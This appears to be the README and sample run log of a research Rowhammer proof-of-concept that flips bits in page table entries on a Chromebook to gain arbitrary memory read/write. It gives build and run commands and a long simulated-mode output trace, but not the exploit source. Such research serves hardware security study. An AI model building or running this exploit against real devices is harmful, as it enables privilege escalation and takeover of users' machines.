This end-to-end exploits combines all the previous building bloks to hammer a PTE leading to an arbitrary read/write primitive. The end-to-end exploit also features a simulation mode, where the bitflips are simulated, i.e., induced via an priviledged interface. This simulation mode can be used to reduce the testing time.
This PoC consits of multiple parts.
To build run the following command:
make
To build in simulation mode, run:
make simulate
To run the PoC on the Chromebook, run:
./kukui_exploit
opened pagemap
address: 0x72a2ce9000
aligned address: 0x72a2e00000
got address: 0x72a2e00000 0
got memory 0x72a2e00000
mapped all pages 2643386368
Search for contiguous memory areas
Found 46 contiguous rows
Found 44 contiguous rows
Found 42 contiguous rows
Found 40 contiguous rows
Found 38 contiguous rows
Found 36 contiguous rows
Found 34 contiguous rows
Found 32 contiguous rows
Found 46 contiguous rows
Found 38 contiguous rows
Found 36 contiguous rows
Found 34 contiguous rows
Found 32 contiguous rows
Found 38 contiguous rows
Found 166 contiguous rows
Found 164 contiguous rows
Found 161 contiguous rows
Found 160 contiguous rows
Found 157 contiguous rows
Found 155 contiguous rows
Found 153 contiguous rows
Found 151 contiguous rows
Found 0 contiguous rows
remove_duplicate_contig_areas
done
Found 4 contiguous memory areas
Total length: 1719 rows
Took 6597 ms
g_file_size=4 MB
iterations=48640
populated pages
unmapping victim pages
spawn_spray_children
opened pagemap
C1 child process started
8 400000
C1 waiting
free ram: 3260620800
C0 victim: 0
C1 victim: 0
C1 0
C1 5000
C0 5000
C1 10000
C0 10000
C1 15000
C1 20000
C0 15000
C1 25000
C0 20000
C1 30000
C0 25000
C1 35000
C1 40000
C0 30000
C1 45000
C0 35000
0
C1 spray_page_tables done
C1 waiting
C0 40000
C0 45000
0
Waiting for children
content: 6800006f9a5fd3
13699a000 2
content: deadbeef00000003
content: 6800006f9a5fd3
1369b0000 5
content: deadbeef00000006
content: 6800005810bfd3
1196fc000 8
content: deadbeef00000009
content: 6800006db65fd3
1196d6000 11
content: deadbeef0000000c
content: 6800006f9a5fd3
1196cf000 14
content: 6800006db65fd3
content: 680001227e2fd3
12281a000 17
content: deadbeef00000012
content: 6800005810bfd3
122830000 20
content: deadbeef00000015
content: 6800006db65fd3
10c5fc000 23
content: deadbeef00000018
content: 6800005810bfd3
10c5d6000 26
content: deadbeef0000001b
pt_counter: 209 6800006f9a5fd3
Hammer the victim rows and check the mappings in parallel
0 / 20
0x13699a000: 6800006f9a5fd3
victim content: 6800006f9a5fd3
pointing to 6f9a5000
content: 1234567800033400
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006f8a5fd3
Changed bit 20 to 0
probably changed a page table
pointing to 6f8a5000
content: 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f8a5fd3
after: val=0x6800006f9a5fd3
Changed bit 20 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006fba5fd3
Changed bit 21 to 1
probably changed a page table
pointing to 6fba5000
content: f761bf084ff0e8bd
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006fba5fd3
after: val=0x6800006f9a5fd3
Changed bit 21 to 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006fda5fd3
Changed bit 22 to 1
probably changed a page table
pointing to 6fda5000
content: 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006fda5fd3
after: val=0x6800006f9a5fd3
Changed bit 22 to 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006f1a5fd3
Changed bit 23 to 0
probably changed a page table
pointing to 6f1a5000
content: 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f1a5fd3
after: val=0x6800006f9a5fd3
Changed bit 23 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006e9a5fd3
Changed bit 24 to 0
probably changed a page table
pointing to 6e9a5000
content: 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006e9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 24 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006d9a5fd3
Changed bit 25 to 0
probably changed a page table
pointing to 6d9a5000
content: 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006d9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 25 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006b9a5fd3
Changed bit 26 to 0
probably changed a page table
pointing to 6b9a5000
content: 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006b9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 26 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x680000679a5fd3
Changed bit 27 to 0
probably changed a page table
pointing to 679a5000
content: 1
Test mode: Flipping bit at address 13699a000...
before: val=0x680000679a5fd3
after: val=0x6800006f9a5fd3
Changed bit 27 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800007f9a5fd3
Changed bit 28 to 1
probably changed a page table
pointing to 7f9a5000
content: 8f3f2000
Test mode: Flipping bit at address 13699a000...
before: val=0x6800007f9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 28 to 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800004f9a5fd3
Changed bit 29 to 0
probably changed a page table
pointing to 4f9a5000
content: 680001227e2fd3
pointing to a page table \o/
2 / 46 0x1369b0000: 6800006f9a5fd3
victim content: 6800006f9a5fd3
pointing to 6f9a5000
content: 1234567800033400
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006f8a5fd3
Changed bit 20 to 0
probably changed a page table
pointing to 6f8a5000
content: 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f8a5fd3
after: val=0x6800006f9a5fd3
Changed bit 20 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006fba5fd3
Changed bit 21 to 1
probably changed a page table
pointing to 6fba5000
content: f761bf084ff0e8bd
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006fba5fd3
after: val=0x6800006f9a5fd3
Changed bit 21 to 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006fda5fd3
Changed bit 22 to 1
probably changed a page table
pointing to 6fda5000
content: 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006fda5fd3
after: val=0x6800006f9a5fd3
Changed bit 22 to 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006f1a5fd3
Changed bit 23 to 0
probably changed a page table
pointing to 6f1a5000
content: 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f1a5fd3
after: val=0x6800006f9a5fd3
Changed bit 23 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006e9a5fd3
Changed bit 24 to 0
probably changed a page table
pointing to 6e9a5000
content: 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006e9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 24 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006d9a5fd3
Changed bit 25 to 0
probably changed a page table
pointing to 6d9a5000
content: 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006d9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 25 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006b9a5fd3
Changed bit 26 to 0
probably changed a page table
pointing to 6b9a5000
content: 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006b9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 26 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x680000679a5fd3
Changed bit 27 to 0
probably changed a page table
pointing to 679a5000
content: 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x680000679a5fd3
after: val=0x6800006f9a5fd3
Changed bit 27 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800007f9a5fd3
Changed bit 28 to 1
probably changed a page table
pointing to 7f9a5000
content: 8f3f2000
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800007f9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 28 to 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800004f9a5fd3
Changed bit 29 to 0
probably changed a page table
pointing to 4f9a5000
content: 680001227e2fd3
pointing to a page table \o/
5 / 46
hammering done
Check mappings
C0 0 / 48639 accessible: 973, inaccessible: 51
C1 0 / 48639 accessible: 924, inaccessible: 100
0 / 20
0x13699a000: 6800004f9a5fd3
victim content: 6800004f9a5fd3
pointing to 4f9a5000
content: 680001227e2fd3
Test mode: Flipping bit at address 13699a000...
before: val=0x6800004f9a5fd3
after: val=0x6800004f8a5fd3
Changed bit 20 to 0
probably changed a page table
pointing to 4f8a5000
content: 680001227e2fd3
pointing to a page table \o/
2 / 46 0x1369b0000: 6800004f9a5fd3
victim content: 6800004f9a5fd3
pointing to 4f9a5000
content: 680001227e2fd3
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800004f9a5fd3
after: val=0x6800004f8a5fd3
Changed bit 20 to 0
probably changed a page table
pointing to 4f8a5000
content: 680001227e2fd3
pointing to a page table \o/
5 / 46